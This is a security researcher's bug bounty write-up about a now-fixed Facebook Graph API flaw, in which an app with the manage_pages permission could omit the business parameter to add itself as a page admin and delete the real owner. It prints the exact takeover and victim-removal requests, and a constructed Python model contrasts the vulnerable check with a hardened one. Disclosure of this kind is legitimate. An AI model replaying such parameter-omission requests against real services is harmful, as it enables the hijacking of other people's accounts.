A security vulnerability in a Facebook Business Manager endpoint allowed a third-party app with limited permissions to take over any Facebook page, and the victim would permanently lose admin access to the page.
By default the Facebook app interface does not allow third-party apps to add or modify page admin roles (page roles such as manager, editor, analyst, etc.). Third-party apps are allowed to perform all other operations, such as posting statuses on your behalf and publishing photos, but not adding admin roles, because if an app were allowed to add or remove admins it could add some user as admin of the page and remove the actual owner forever.
On the other hand, there is an endpoint for business pages called userpermissions which allows adding or removing page admin roles for users who already handle the Facebook business.
The following request would make the target user an admin of the page.
Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<app_access_token>
Response :-
true
After a few minutes of testing I got to know that removing the business parameter from the request didn't throw any error and allowed us to add anyone as a new page admin and delete the actual page admin on a non-business page where the app has the manage_pages permission.
That's it! Whatever the app may be, if it has the manage_pages permission from the admin, it could hack all of your Facebook pages in a fraction of a second.
Page Takeover:
Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<app_access_token>
Response :-
true
Removing the Victim:
Request :-
DELETE /<page_id>/userpermissions HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
user=<target_user_id>&access_token=<app_access_token>
Response :-
true
That's all! The target page is hacked!
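The authorization decision behind this endpoint, modelled as an added example (constructed here, not Facebook's code): the pre-fix check that only ran when the business parameter was sent, next to a hardened version that treats page role edits as business-manager operations. Page, token, user and business identifiers are invented, and the hardened rules are an assumed design, not the actual fix Facebook shipped.

```python
from dataclasses import dataclass, field
from typing import Optional, Set

# Constructed model of the page-role authorization check; nothing here
# talks to graph.facebook.com and every identifier below is invented.

@dataclass
class Page:
    page_id: str
    business_id: Optional[str]            # None for a page not owned by a business
    admins: Set[str] = field(default_factory=set)

@dataclass
class Token:
    app_id: str
    user_id: str                          # user who granted the app its permissions
    scopes: Set[str] = field(default_factory=set)

# Which users administer which business (constructed sample data).
BUSINESS_ADMINS = {"biz_100": {"u_owner"}}

def _apply(page: Page, target: str, remove: bool) -> bool:
    (page.admins.discard if remove else page.admins.add)(target)
    return True

def vulnerable_change_role(page: Page, token: Token, target: str,
                           remove: bool = False, business: Optional[str] = None) -> bool:
    """Pre-fix behaviour as described in the post: manage_pages suffices and the
    business check only runs when a business parameter happens to be present."""
    if "manage_pages" not in token.scopes:
        return False
    if business is not None and business != page.business_id:
        return False
    return _apply(page, target, remove)

def hardened_change_role(page: Page, token: Token, target: str,
                         remove: bool = False, business: Optional[str] = None) -> bool:
    """Assumed hardened design: a missing business parameter is a denial, the
    page must belong to that business, the calling user must administer it,
    and the last remaining admin can never be removed."""
    if business is None or page.business_id != business:
        return False
    if token.user_id not in BUSINESS_ADMINS.get(business, set()):
        return False
    if remove and target in page.admins and len(page.admins) == 1:
        return False
    return _apply(page, target, remove)
```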
I reported this vulnerability to the Facebook security team and it is completely fixed now. They rewarded me $2500 USD as part of their bug bounty program.
Even though they have placed a fix for this vulnerability, please be aware of the permissions you grant to any apps.
If manage_pages is requested, please note that the app would be able to manage your pages (post statuses, publish photos, etc.).
Don't worry, you can still modify the permissions you have granted to other apps here.